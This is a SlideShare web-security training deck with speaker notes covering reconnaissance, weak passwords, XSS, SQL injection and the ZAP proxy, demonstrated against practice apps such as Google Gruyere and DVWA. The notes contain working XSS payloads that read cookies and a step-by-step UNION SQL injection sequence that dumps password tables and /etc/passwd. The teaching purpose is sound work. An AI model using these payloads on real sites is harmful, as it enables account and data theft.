Successfully reported this slideshow.
Your SlideShare is downloading. ×

Security testing operation vijay

Ad

Security Testing
Operation Vijay

Ad

What is hacking?

Ad

Hackers

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Ad

Check these out next

1 of 30 Ad
1 of 30 Ad

Security testing operation vijay

Download to read offline

Understand basics of testing security aspects like passwords, robots.txt. Understand SQL Injection and XSS attacks. Automation of them using ZAP proxy tool.

Understand basics of testing security aspects like passwords, robots.txt. Understand SQL Injection and XSS attacks. Automation of them using ZAP proxy tool.

Advertisement
Advertisement

More Related Content

Advertisement

Security testing operation vijay

  1. 1. Security Testing Operation Vijay
  2. 2. What is hacking?
  3. 3. Hackers
  4. 4. Types of Hackers ● Ethical Hackers ● Crackers
  5. 5. Define Security Testing is a type of testing that intends to uncover vulnerabilities of the system and determine that its data and resources are protected from possible intruders.
  6. 6. Types of Security Testing ● Infrastructure Security Testing ● Application Security Testing
  7. 7. When?
  8. 8. Security Testing Vocabulary ● Reconnaissance/ Information gathering ● Vulnerability ● Exploit
  9. 9. Reconnaissance Demo
  10. 10. Reconnaissance Mission
  11. 11. P@ssw04d
  12. 12. Default / Weak Passwords
  13. 13. Password Vaults Demo
  14. 14. Cross Site Scripting Client side injection attack Types: Reflected XSS Stored XSS DOM based XSS
  15. 15. Reflected XSS Demo
  16. 16. Reflected XSS Mission
  17. 17. Stored XSS Demo
  18. 18. Stored XSS Mission
  19. 19. XSS Prevention Don’t use user input as-is Encoding X-XSS-Protection Response Header HttpOnly flag Response Header
  20. 20. Popular XSS Attacks
  21. 21. SQL Injection Attack where SQL commands are injected in order to affect the execution of predefined SQL commands
  22. 22. SQL Injection Demo
  23. 23. SQL Injection Prevention Don’t use user input directly Use prepared statements Use stored procedures Use frameworks
  24. 24. ZAP
  25. 25. References https://www.owasp.org https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project https://www.google.co.in/about/appsecurity/tools/ https://xkcd.com/327/ http://www.dvwa.co.uk/ https://www.amazon.in/Web-Application-Hackers-Handbook-Exploiting- ebook/dp/B005LVQA9S https://google-gruyere.appspot.com
  26. 26. Thank you Dhaval Doshi (@dhavaldoshi) Lavanya Mohan (@LavanyaMohan210) Shirish Padalkar (@_Garbage_)

Editor's Notes

  • Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose
  • Why do real hackers hack? What is their motivation?
    Money?
    Damage to opponent
    Fame
    Government does hacking to get information

  • Also known as ethical hackers, White Hat hackers are the good guys of the hacker world. They’ll help you remove a virus or PenTest a company.
    Black Hat – Also known as crackers, these are the men and women you hear about in the news. They find banks or other companies with weak security and steal money or credit card information. The surprising truth about their methods of attack is that they often use common hacking practices they learned early on.
    Gray Hat – Nothing is ever just black or white; the same is true in the world of hacking. Gray Hat hackers don’t steal money or information (although, sometimes they deface a website or two), yet they don’t help people for good (but, they could if they wanted to). These hackers comprise most of the hacking world, even though Black Hat hackers garner most (if not all) of the media’s attention.
  • Infrastructure Security Testing
    Hack windows machine to get full control
    Causing network to go down

    Application Security Testing
    JIRA installed on a local server
  • When do you do security testing???

    When should we do security testing?
  • Reconnaissance - mission to obtain information by visual observation or other detection methods
    a vulnerability is a weakness which allows an attacker to reduce a system's information assurance
    Exploit - causing unintended or unanticipated behaviour to occur on computer software, hardware, or something electronic (usually computerised) by taking advantage of vulnerabilities
  • http://www.hackingtheuniverse.com/

    i don’t like these guys
    i want to do some damage
    how do i start hacking
    lets think
    any ideas???

    Show them wappalyzer.
    It shows versions as well. If the version of some software they are using has known vulnerabilities, that can be exploited.

    Example: http://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/



    Show
    Wappalyzer
    Robots.txt
    Admin login screen

    Task ->
  • http://www.hackingtheuniverse.com/

    i don’t like these guys
    i want to do some damage
    how do i start hacking
    lets think
    any ideas???

    Show them wappalyzer.
    It shows versions as well. If the version of some software they are using has known vulnerabilities, that can be exploited.

    Example: http://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/



    Show
    Wappalyzer
    Robots.txt
    Admin login screen

    Task ->
  • Ask for details of password
    It is recommended to use more than 8 characters in password. How many have less than 8 characters password for email?
    How many have only small case?
    Blah….
    What would be your guess for their password

    What we were doing here is applying social engineering techniques to get to know your passwords or other important information. Can we really get details by just talking and not using a computer?
    Let’s see a video.
  • https://www.youtube.com/watch?v=lc7scxvKQOo

  • Default username and password like admin password for admin consoles.
    People use very common passwords (like password or just numbers, their names or dictionary words)
    41% people use only lowercase password. Only about 4% use special characters in passwords
    50% of people have password less than 8 characters in length (at least 8 is recommended)
  • XSS attacks are type of injection attacks in which the attacker injects malicious code in web pages that are viewed by other users of the application.
  • Basic using script tag
    Ask if you can just sanitize script tag.. Show how to bypass that -> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
  • https://google-gruyere.appspot.com/536172483468/%3Cscript%3Ealert(document.cookie)%3C/script%3E

    https://google-gruyere.appspot.com/536172483468/feed.gtl?uid=%3Cscript%3Ealert(1)%3C/script%3E
  • Ask if small text fields will prevent this attack
    Tell them about intercepting requests
  • <a onmouseover="alert(1)" href="#">read this!</a>

    <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>

    Google Gruyere:
    Stored XSS:
    (New snippet)
    <a onmouseover="alert(1)" href="#">read this!</a>
    <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>

  • HTML encoding (< → &lt;)
    URL encoding before inserting it into HTML
    HTML attribute encoding
    CSS encoding
    This HTTP response header enables the Cross-site scripting (XSS) filter built into some modern web browsers. This header is usually enabled by default anyway, so the role of this header is to re-enable the filter for this particular website if it was disabled by the user.
    HttpOnly flag is included in the HTTP response header, the cookie cannot be accessed through client side script
  • It happens when computers cannot tell difference between code and data
  • 2
    '
    2' #
    2' OR 1=1
    2' Union select null #
    2' union Select null, null #
    2' Union Select null, @@version #
    2' Union Select null, database() #
    2' union select null, table_name from information_schema.tables #
    2' union select null, table_name from information_schema.tables where table_name like '%user%' #
    2' Union select null, column_name from information_schema.columns where table_name='users' #
    1' Union select null, concat(user, 0x0a,password) from users #
    2' Union select null, LOAD_FILE('/etc/passwd') #
  • https://www.google.co.in/about/appsecurity/tools/

×